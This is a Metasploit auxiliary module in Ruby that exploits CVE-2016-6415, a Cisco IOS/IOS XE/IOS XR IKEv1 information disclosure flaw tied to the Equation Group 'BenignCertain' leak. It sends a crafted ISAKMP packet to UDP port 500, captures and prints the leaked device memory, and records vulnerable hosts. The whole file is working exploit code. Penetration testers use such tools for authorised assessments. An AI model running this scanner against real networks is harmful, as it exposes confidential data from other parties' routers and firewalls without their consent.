Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Scanner
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Cisco IKE Information Disclosure',
13
      'Description'    => %q{
14
        A vulnerability in Internet Key Exchange version 1 (IKEv1) packet
15
        processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software
16
        could allow an unauthenticated, remote attacker to retrieve memory
17
        contents, which could lead to the disclosure of confidential information.
18

19
        The vulnerability is due to insufficient condition checks in the part
20
        of the code that handles IKEv1 security negotiation requests.
21
        An attacker could exploit this vulnerability by sending a crafted IKEv1
22
        packet to an affected device configured to accept IKEv1 security
23
        negotiation requests. A successful exploit could allow the attacker
24
        to retrieve memory contents, which could lead to the disclosure of
25
        confidential information.
26
      },
27
      'Author'         => [ 'Nixawk' ],
28
      'License'        => MSF_LICENSE,
29
      'References'     =>
30
        [
31
          [ 'CVE', '2016-6415' ],
32
          [ 'URL', 'https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110' ],
33
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1' ],
34
          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6415' ],
35
          [ 'URL', 'https://musalbas.com/2016/08/18/equation-group-benigncertain.html' ]
36
        ],
37
      'DisclosureDate' => '2016-09-29'
38
    ))
39

40
    register_options(
41
      [
42
        Opt::RPORT(500),
43
        OptPath.new('PACKETFILE',
44
          [ true, 'The ISAKMP packet file', File.join(Msf::Config.data_directory, 'exploits', 'cve-2016-6415', 'sendpacket.raw') ])
45
      ])
46
  end
47

48
  def run_host(ip)
49
    begin
50
      isakmp_pkt = File.read(datastore['PACKETFILE'])
51
      peer = "#{ip}:#{datastore['RPORT']}"
52

53
      udp_sock = Rex::Socket::Udp.create(
54
        {
55
          'Context' => { 'Msf' => framework, 'MsfExploit' => self }
56
        }
57
      )
58

59
      add_socket(udp_sock)
60

61
      udp_sock.sendto(isakmp_pkt, ip, datastore['RPORT'].to_i)
62
      res = udp_sock.get(3)
63
      return unless res && res.length > 36 # ISAKMP + 36 -> Notitication Data...
64

65
      # Convert non-printable characters to periods
66
      printable_data = res.gsub(/[^[:print:]]/, '.')
67

68
      # Show abbreviated data
69
      vprint_status("Printable info leaked:\n#{printable_data}")
70

71
      chars = res.unpack('C*')
72
      len = (chars[30].to_s(16) + chars[31].to_s(16)).hex
73

74
      return if len <= 0
75
      print_good("#{peer} - IKE response with leak")
76
      report_vuln({
77
        :host => ip,
78
        :port => datastore['RPORT'],
79
        :proto => 'udp',
80
        :name => self.name,
81
        :refs => self.references,
82
        :info => "Vulnerable to Cisco IKE Information Disclosure"
83
      })
84

85
      # NETWORK may return the same packet data.
86
      return if res.length < 2500
87
      pkt_md5 = ::Rex::Text.md5(isakmp_pkt[isakmp_pkt.length-2500, isakmp_pkt.length])
88
      res_md5 = ::Rex::Text.md5(res[res.length-2500, res.length])
89

90
      print_warning("#{peer} - IKE response is same to payload data") if pkt_md5 == res_md5
91
    rescue
92
    ensure
93
      udp_sock.close
94
    end
95
  end
96
end
97

98